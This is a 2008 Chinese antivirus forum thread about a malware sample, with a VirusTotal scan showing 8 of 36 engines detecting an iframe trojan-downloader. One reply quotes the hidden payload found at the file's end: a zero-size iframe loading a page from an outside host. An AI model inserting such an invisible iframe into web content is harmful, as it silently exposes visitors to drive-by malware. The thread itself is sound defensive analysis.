卡巴找到的很多MISS..

显示全部楼层 · 发表于 2008-11-2 03:56:45

File D755B77346346410EA15B7F96B9630ED. received on 11.01.2008 20:53:05 (CET)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

Result: 8/36 (22.23%)

Loading server information...
Your file is queued in position: 3.
Estimated start time is between 56 and 80 seconds.
Do not close the window until scan is complete.
The scanner that was processing your file is stopped at this moment, we are going to wait a few seconds to try to recover your result.
If you are waiting for more than five minutes you have to resend your file.
Your file is being scanned by VirusTotal in this moment,
results will be shown as they're generated.

Compact
Print results

Your file has expired or does not exists.
Service is stopped in this moments, your file is waiting to be scanned (position:
) for an undefined time. You can wait for web response (automatic reload) or type your email in the form below and click "request" so the system sends you a notification when the scan is finished.

Email:

Antivirus	Version	Last Update	Result
AhnLab-V3	2008.11.1.0	2008.11.01	-
AntiVir	7.9.0.10	2008.10.31	-
Authentium	5.1.0.4	2008.11.01	-
Avast	4.8.1248.0	2008.11.01	HTML:Iframe-gen
AVG	8.0.0.161	2008.11.01	-
BitDefender	7.2	2008.11.01	-
CAT-QuickHeal	9.50	2008.11.01	-
ClamAV	0.94.1	2008.11.01	HTML.IFrame.IMG
DrWeb	4.44.0.09170	2008.11.01	-
eSafe	7.0.17.0	2008.10.30	-
eTrust-Vet	31.6.6185	2008.11.01	-
Ewido	4.0	2008.11.01	-
F-Prot	4.4.4.56	2008.11.01	-
F-Secure	8.0.14332.0	2008.11.01	Trojan-Downloader.HTML.IFrame.sz
Fortinet	3.117.0.0	2008.10.31	-
GData	19	2008.11.01	HTML:Iframe-gen
Ikarus	T3.1.1.44.0	2008.11.01	-
K7AntiVirus	7.10.514	2008.11.01	-
Kaspersky	7.0.0.125	2008.11.01	Trojan-Downloader.HTML.IFrame.sz
McAfee	5420	2008.11.01	Suspicious IFrame.e
Microsoft	1.4005	2008.11.01	-
NOD32	3575	2008.10.31	-
Norman	5.80.02	2008.10.31	-
Panda	9.0.0.4	2008.11.01	-
PCTools	4.4.2.0	2008.11.01	-
Prevx1	V2	2008.11.01	-
Rising	21.01.52.00	2008.11.01	-
SecureWeb-Gateway	6.7.6	2008.11.01	-
Sophos	4.35.0	2008.11.01	Mal/Iframe-F
Sunbelt	3.1.1767.2	2008.10.31	-
Symantec	10	2008.11.01	-
TheHacker	6.3.1.1.135	2008.10.31	-
TrendMicro	8.700.0.1004	2008.10.31	TROJ_IFRAME.AKD
VBA32	3.12.8.9	2008.11.01	-
ViRobot	2008.10.31.1446	2008.10.31	-
VirusBuster	4.5.11.0	2008.10.31	-

Additional information

File size: 24737 bytes

MD5...: 1c08c6f3cf4f9157ea0352e204ba6f3f

SHA1..: c9544ed76eb35a51f34d705060f477aa8c2c779c

SHA256: 6976b1e5d142bd0b8591ff44a019cad400bc268b9d2432d962d1cf3e1a457dc9

SHA512: 2bc55c695e1c2a36134619bfedbdf7b411fcac91f4ce60416199463e35c28859
fd816ed028b5980858c0f0ef43cdd47ea249498e3ef282c1c00022df29358aea

PEiD..: -

TrID..: File type identification
RAR Archive (83.3%)
REALbasic Project (16.6%)

PEInfo: -

[ 本帖最后由 lingbo110120 于 2008-11-2 12:34 编辑 ]

显示全部楼层 · 发表于 2008-11-2 09:46:00

TO KL

显示全部楼层 · 发表于 2008-11-2 10:21:30

文件末尾的<iframe src="http://my.nbip.net/homepage/oldnb/mm/index.html" width=0 height=0></iframe>

复制代码

> 代码: 读取代码:hxp://my.nbip.net/homepage/oldnb/mm/index.html
= 失败

显示全部楼层 · 发表于 2008-11-2 12:02:11

给我的回复不是误报
什么情况

显示全部楼层 · 发表于 2008-11-2 12:06:31

OK 是我失误...我分析不到位我改成TXT后缀的时候尽然没看到最后的
抱歉

显示全部楼层 · 发表于 2008-11-2 12:26:42

505报木马。

显示全部楼层 · 发表于 2008-11-2 12:31:34

不是误报
Hello.

whow you explain string "<iframe src="http://my.nbip.net/homepage/oldnb/mm/index.html" width=0 height=0></iframe>" in the end of file?
Please quote all when answering.
-----------------
> Regards, Vitaly Butuzov
> Virus Analyst, Kaspersky Lab.

显示全部楼层 · 发表于 2008-11-2 12:58:13

小Akill

显示全部楼层 · 发表于 2008-11-2 13:06:02

过诺顿10.1

显示全部楼层 · 发表于 2008-11-2 13:08:58

我看一下吧！

[病毒样本] 卡巴找到的很多MISS..

本帖子中包含更多资源

本帖子中包含更多资源

回复 4楼 lingbo110120 的帖子

[病毒样本] 卡巴找到的 很多MISS..

本帖子中包含更多资源

本帖子中包含更多资源

回复 4楼 lingbo110120 的帖子

[病毒样本] 卡巴找到的很多MISS..